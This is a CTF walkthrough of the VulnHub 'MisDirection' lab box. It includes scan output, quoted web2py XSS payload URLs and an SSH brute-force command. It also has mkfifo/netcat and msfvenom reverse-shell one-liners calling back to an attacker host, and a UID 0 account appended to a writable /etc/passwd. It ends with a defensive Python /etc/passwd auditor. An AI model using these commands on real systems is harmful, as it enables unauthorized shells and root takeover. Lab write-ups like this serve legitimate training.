INFO
Name : MisDirection
Difficulty : Intermediate
Type : boot2root Source
VulnHub URL : https://www.vulnhub.com/entry/misdirection-1,371/
Entry : 11 / 35
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I'm using both VMware Workstation and VirtualBox (depending on the image) to host Kali and the MisDirection image, with both VMs running in a NAT network (sometimes bridged). I tried VirtualBox first but couldn't reach the network for some reason, so I used Workstation this time.
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB RECONNAISSANCE
4. EXPLOITATION
5. POST EXPLOITATION
6. PRIVILEGE ESCALATION
1. DISCOVERY
: netdiscover
Currently scanning: 192.168.32.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 2 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.20.9 00:0c:29:fc:63:e5 2 120 VMware, Inc.
2. SCANNING
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Rocket httpd 1.2.6 (Python 2.7.15rc1)
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Rocket (Python 2.7)
3. WEB RECONNAISSANCE
+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /admin/status: Tomcat Server Status interface found (pass protected)
+ /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
---- Scanning URL: http://192.168.20.9/ ----
+ http://192.168.20.9/.bash_history (CODE:400|SIZE:50)
+ http://192.168.20.9/.bashrc (CODE:400|SIZE:50)
+ http://192.168.20.9/.cache (CODE:400|SIZE:50)
+ http://192.168.20.9/.config (CODE:400|SIZE:50)
+ http://192.168.20.9/.cvs (CODE:400|SIZE:50)
+ http://192.168.20.9/.cvsignore (CODE:400|SIZE:50)
+ http://192.168.20.9/.forward (CODE:400|SIZE:50)
+ http://192.168.20.9/.git/HEAD (CODE:400|SIZE:50)
+ http://192.168.20.9/.history (CODE:400|SIZE:50)
+ http://192.168.20.9/.hta (CODE:400|SIZE:50)
+ http://192.168.20.9/.htaccess (CODE:400|SIZE:50)
+ http://192.168.20.9/.htpasswd (CODE:400|SIZE:50)
+ http://192.168.20.9/.listing (CODE:400|SIZE:50)
+ http://192.168.20.9/.listings (CODE:400|SIZE:50)
+ http://192.168.20.9/.mysql_history (CODE:400|SIZE:50)
+ http://192.168.20.9/.passwd (CODE:400|SIZE:50)
+ http://192.168.20.9/.perf (CODE:400|SIZE:50)
+ http://192.168.20.9/.profile (CODE:400|SIZE:50)
+ http://192.168.20.9/.rhosts (CODE:400|SIZE:50)
+ http://192.168.20.9/.sh_history (CODE:400|SIZE:50)
+ http://192.168.20.9/.ssh (CODE:400|SIZE:50)
+ http://192.168.20.9/.subversion (CODE:400|SIZE:50)
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 0 L 2 W 50 Ch "@"
000000035: 200 0 L 6 W 42 Ch "admin"
000000093: 400 0 L 2 W 50 Ch "bak-up"
000000089: 400 0 L 2 W 50 Ch "back-up"
000000163: 400 0 L 2 W 50 Ch "cgi-win"
000000162: 400 0 L 2 W 50 Ch "cgi-bin"
000000338: 400 0 L 2 W 50 Ch "fcgi-bin"
000000324: 200 133 L 470 W 6937 Ch "examples"
000000450: 400 0 L 2 W 50 Ch "java-sys"
000000495: 400 0 L 2 W 50 Ch "lost%2Bfound"
000000432: 200 113 L 387 W 5782 Ch "init"
000000545: 400 0 L 2 W 50 Ch "ms-sql"
000000549: 400 0 L 2 W 50 Ch "my-sql"
000000908: 400 0 L 2 W 50 Ch "WEB-INF"
000000921: 200 288 L 747 W 13705 Ch "welcome"
port 80
login page :
web2py
sign up attempt : not possible
vulnerability search :
Reflected XSS(Cross Site Scripting) : CVE-2016-4807
GET URI - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl
Vulnerable Parameter - source
Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
Authentication Required - Yes(Administrator)
Steps To Reproduction
1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
2) The parameter "source" value will get reflected on the page on "Here" button.
3) When you will click on that button "Here" XSS payload will get executed.
Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk
Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
============================================================================
CSRF(Cross Site Request Forgery): CVE-2016-4808
GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]
Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]
Noted for reference only; moving on.
port 8080 :
/8080 enumeration :
[ Running ] Nikto against 192.168.20.9:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.20.9
+ Target Hostname: 192.168.20.9
+ Target Port: 8080
+ Start Time: 2021-03-30 15:33:18 (GMT9)
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 58a38e5a14c97, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /help/: Directory indexing found.
+ /help/: Help directory should not be accessible
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
/icons/ (Status: 403) [Size: 295]
/help/ (Status: 200) [Size: 739]
/scripts/ (Status: 200) [Size: 745]
/index.html (Status: 200) [Size: 10918]
/css/ (Status: 200) [Size: 737]
/development/ (Status: 200) [Size: 753]
/manual/ (Status: 200) [Size: 743]
/js/ (Status: 200) [Size: 735]
/shell/ (Status: 200) [Size: 741]
/images/ (Status: 200) [Size: 743]
/wordpress/ (Status: 200) [Size: 11419]
/debug/ (Status: 200) [Size: 12908]
/server-status/ (Status: 403) [Size: 303]
wordpress :
┌──(root💀takudaddy)-[/test]
└─# wpscan --url http://192.168.20.9:8080/wordpress --enumerate t
/debug :
A shell is available!
4. EXPLOITATION
A parade of trial and error
p0wny@shell:…/www/html# cd /home
p0wny@shell:/home# ls
brexit
p0wny@shell:/home# ls -al
total 12
drwxr-xr-x 3 root root 4096 Jun 1 2019 .
drwxr-xr-x 23 root root 4096 Jun 1 2019 ..
drwxr-xr-x 6 brexit brexit 4096 Jun 1 2019 brexit
p0wny@shell:/home# cd brexit
p0wny@shell:/home/brexit# ls -al
total 60
drwxr-xr-x 6 brexit brexit 4096 Jun 1 2019 .
drwxr-xr-x 3 root root 4096 Jun 1 2019 ..
-rw------- 1 brexit brexit 0 Jun 1 2019 .bash_history
-rw-r--r-- 1 brexit brexit 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 brexit brexit 3771 Apr 4 2018 .bashrc
drwx------ 3 brexit brexit 4096 Jun 1 2019 .cache
drwx------ 3 brexit brexit 4096 Jun 1 2019 .gnupg
drwxrwxr-x 3 brexit brexit 4096 Jun 1 2019 .local
-rw-r--r-- 1 brexit brexit 807 Apr 4 2018 .profile
-rw-rw-r-- 1 brexit brexit 66 Jun 1 2019 .selected_editor
-rw------- 1 brexit brexit 9346 Jun 1 2019 .viminfo
-rwxrwxr-x 1 brexit brexit 90 Jun 1 2019 start-vote.sh
-r--r----- 1 brexit brexit 33 Jun 1 2019 user.txt
drwxrwxr-x 16 brexit brexit 4096 Mar 30 13:48 web2py
Now that I know the user brexit,
I also tried cracking the password with hydra:
┌──(root💀takudaddy)-[/attack]
└─# hydra -l brexit -P /usr/share/wordlists/rockyou.txt ssh://192.168.20.9
More trial and error
p0wny@shell:/# uname -a
Linux misdirection 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
p0wny@shell:/# whicn mc
sh: 1: whicn: not found
p0wny@shell:/# which nc
/bin/nc
p0wny@shell:/# which wget
/usr/bin/wget
p0wny@shell:/# which socat
p0wny@shell:/# netstat -nltup
(No info could be read for "-p": geteuid()=33 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 192.168.20.9:68 0.0.0.0:* -
p0wny@shell:/var# which curl
/usr/bin/curl
p0wny@shell:/var# curl http://127.0.0.1/8000
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 50 100 50 0 0 25000 0 --:--:-- --:--:-- --:--:-- 25000
<html><body><h1>invalid request</h1></body></html>
But the key step is the following.
p0wny@shell:…/html/debug# id && whoami
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
p0wny@shell:/home/brexit# sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on localhost:
(brexit) NOPASSWD: /bin/bash
p0wny@shell:/home/brexit# sudo /bin/bash
sudo: no tty present and no askpass program specified
p0wny@shell:/home/brexit# sudo -u brexit /bin/bash
sudo: no tty present and no askpass program specified
Now for user brexit:
we can run /bin/bash with brexit's privileges, but this shell has no tty (teletypewriter) set up, so it won't run.
In this case, simply running the bash command solves it.
For practice, let's look for another approach.
Let's simply open a port with nc.
p0wny@shell:…/html/debug# nc -e /bin/sh 192.168.20.1 7979
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
This nc build doesn't support the -e option, so this method can't be used.
Let's connect through a 'fifo', the named pipe used for inter-process communication.
There are two ways to do this.
1. First, start a listener on the attacking machine,
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979
listening on [any] 7979 ...
then in the target's shell, create a fifo named 'f' under /tmp with the mkfifo command:
$ rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.20.1 7979 > /tmp/f
p0wny@shell:…/html/debug# rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.20.1 7979 > /tmp/f
The connection succeeds,
connect to [192.168.20.1] from (UNKNOWN) [192.168.20.9] 56790
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@misdirection:/home/brexit$
and after entering the command sudo -u brexit /bin/bash,
www-data@misdirection:/home/brexit$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on localhost:
(brexit) NOPASSWD: /bin/bash
www-data@misdirection:/home/brexit$ sudo /bin/bash
sudo /bin/bash
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@misdirection:/home/brexit$ sudo -u brexit /bin/bash
sudo -u brexit /bin/bash
brexit@misdirection:~$
the switch to user brexit succeeded.
2. Another way that uses the mkfifo command: generating a netcat reverse payload with msfvenom on the attacking machine produces the command to enter (the mkfifo command printed at the bottom).
┌──(root💀takudaddy)-[~]
└─# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.20.1 LPORT=7979
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 94 bytes
mkfifo /tmp/zydqc; nc 192.168.20.1 7979 0</tmp/zydqc | /bin/sh >/tmp/zydqc 2>&1; rm /tmp/zydqc
Start the listener,
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979
listening on [any] 7979 ...
then copy that mkfifo command and paste it into the shell on the target.
p0wny@shell:…/html/debug# mkfifo /tmp/zydqc; nc 192.168.20.1 7979 0</tmp/zydqc | /bin/sh >/tmp/zydqc 2>&1; rm /tmp/zydqc
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979
listening on [any] 7979 ...
connect to [192.168.20.1] from (UNKNOWN) [192.168.20.9] 46318
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sudo -u brexit /bin/bash
id
uid=1000(brexit) gid=1000(brexit) groups=1000(brexit),24(cdrom),30(dip),46(plugdev),108(lxd)
Success!
5. POST EXPLOITATION
brexit@misdirection:/home$ cd brexit
cd brexit
brexit@misdirection:~$ ls
ls
start-vote.sh user.txt web2py
brexit@misdirection:~$ cat user.txt
cat user.txt
404b9193154be7fbbc56d7534cb26339
Found the first user flag.
Finding writable files
brexit@misdirection:~$ find / -writable -type f 2>/dev/null
.....
/sys/fs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/etc/passwd
/etc/passwd is reported as writable
brexit@misdirection:~$ ls -l /etc/passwd
ls -l /etc/passwd
-rwxrwxr-- 1 root brexit 1617 Jun 1 2019 /etc/passwd
6. PRIVILEGE ESCALATION
Generate a password hash with openssl and insert it.
First attempt
brexit@misdirection:/tmp$ openssl passwd -1
openssl passwd -1
Password: taku
Verifying - Password: taku
$1$LJuuH2jz$GpmUyasBa/z1xyx/okkfq1
brexit@misdirection:/tmp$ su
su
Password: taku
su: Authentication failure
Failed
Second attempt
brexit@misdirection:/var/www/html/debug$ openssl passwd -1 -salt t taku
openssl passwd -1 -salt t taku
$1$t$1ep7jYZ3RK3MfNWwHatNC1
brexit@misdirection:/var/www/html/debug$ echo "taku:$1$t$1ep7jYZ3RK3MfNWwHatNC1:0:0:root:/root:/bin/bash" >>/etc/passwd
brexit@misdirection:/var/www/html/debug$ tail -1 /etc/passwd
tail -1 /etc/passwd
taku:ep7jYZ3RK3MfNWwHatNC1:0:0:root:/root:/bin/bash
brexit@misdirection:/var/www/html/debug$ su taku
su taku
Password: taku
su: Authentication failure
Failed
Looking closely, the cause seems to be that the hash passed through echo was not inserted intact but partly cut off.
Experimenting showed the problem was the special character ($): inside double quotes the shell expands $1 and $t as (empty) parameters before echo ever sees the string.
So, third attempt: putting a backslash before each $ and re-entering the completed line, it was inserted correctly and the user switch went straight through!
brexit@misdirection:/tmp$ openssl passwd -1
openssl passwd -1
Password: taku
Verifying - Password: taku
$1$OJ.VOZR2$l4Xu6mUiPoA/exCFn1U15.
brexit@misdirection:/tmp$ echo "master:\$1\$OJ.VOZR2\$l4Xu6mUiPoA/exCFn1U15.:0:0:root:/root:/bin/bash" >> /etc/passwd
brexit@misdirection:/tmp$ tail -1 /etc/passwd
tail -1 /etc/passwd
master:$1$OJ.VOZR2$l4Xu6mUiPoA/exCFn1U15.:0:0:root:/root:/bin/bash
brexit@misdirection:/tmp$ su master
su master
Password: taku
root@misdirection:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@misdirection:/tmp# cd /root
cd /root
root@misdirection:~# ls
ls
root.txt
root@misdirection:~# cat root.txt
cat root.txt
0d2c6222bfdd3701e0fa12a9a9dc9c8c
Success!
Confirmed the root flag as well.
Done!
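As an added defender-side example (not part of the original writeup), the following Python script audits an /etc/passwd file for the two conditions this box relied on: a file writable by a non-root group, and password hashes or extra UID 0 accounts planted directly in /etc/passwd instead of /etc/shadow. The sample file is constructed; its "taku" line reproduces what the second attempt wrote, since inside double quotes the shell expanded $1 and $t to empty strings before echo ran, and the mode 0o774 is the one listed in the writeup.

```python
import os
import re
import stat

# Constructed sample (not the box's real file): the passwd file as it would look
# after the writeup's second and third attempts. The "taku" line is the garbled
# remainder left after the shell expanded $1 and $t inside double quotes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
taku:ep7jYZ3RK3MfNWwHatNC1:0:0:root:/root:/bin/bash
master:$1$OJ.VOZR2$l4Xu6mUiPoA/exCFn1U15.:0:0:root:/root:/bin/bash
"""

# crypt(3) prefixes: MD5 ($1$), bcrypt ($2x$), SHA-256 ($5$), SHA-512 ($6$), yescrypt ($y$)
CRYPT_HASH_RE = re.compile(r"^\$(1|2[aby]?|5|6|y)\$[^:]+$")

# Values that legitimately appear in the password field of /etc/passwd
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd_entries(text):
    """Return (line_number, finding, account) tuples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((lineno, "empty password field", name))
        elif pw not in SHADOWED_OR_LOCKED:
            # A hash belongs in /etc/shadow; anything else here is either a planted
            # hash or the garbled remains of one.
            kind = "crypt hash in passwd" if CRYPT_HASH_RE.match(pw) else "garbled password field"
            findings.append((lineno, kind, name))
        if uid == "0" and name != "root":
            findings.append((lineno, "extra uid 0 account", name))
    return findings


def audit_mode_bits(mode, owner_uid):
    """Check ownership and permission bits of a passwd file (mode as from stat)."""
    issues = []
    if owner_uid != 0:
        issues.append(f"owner uid is {owner_uid}, expected 0")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append(f"writable by group or others (mode {oct(mode)})")
    return issues


def audit_passwd_file(path="/etc/passwd"):
    """Run both checks against a real file; returns (mode_issues, entry_findings)."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        entries = audit_passwd_entries(fh.read())
    return audit_mode_bits(stat.S_IMODE(st.st_mode), st.st_uid), entries


if __name__ == "__main__":
    # Demo run on the constructed sample and the writeup's listed mode (0o774, owner root).
    for issue in audit_mode_bits(0o774, 0):
        print("mode:", issue)
    for lineno, kind, who in audit_passwd_entries(SAMPLE_PASSWD):
        print(f"line {lineno}: {kind} ({who})")
```

Run against the live file with audit_passwd_file() from a periodic job or a host-based check; a clean system returns an empty list for both results, and either a group-writable mode or a non-root UID 0 entry is worth an alert on its own.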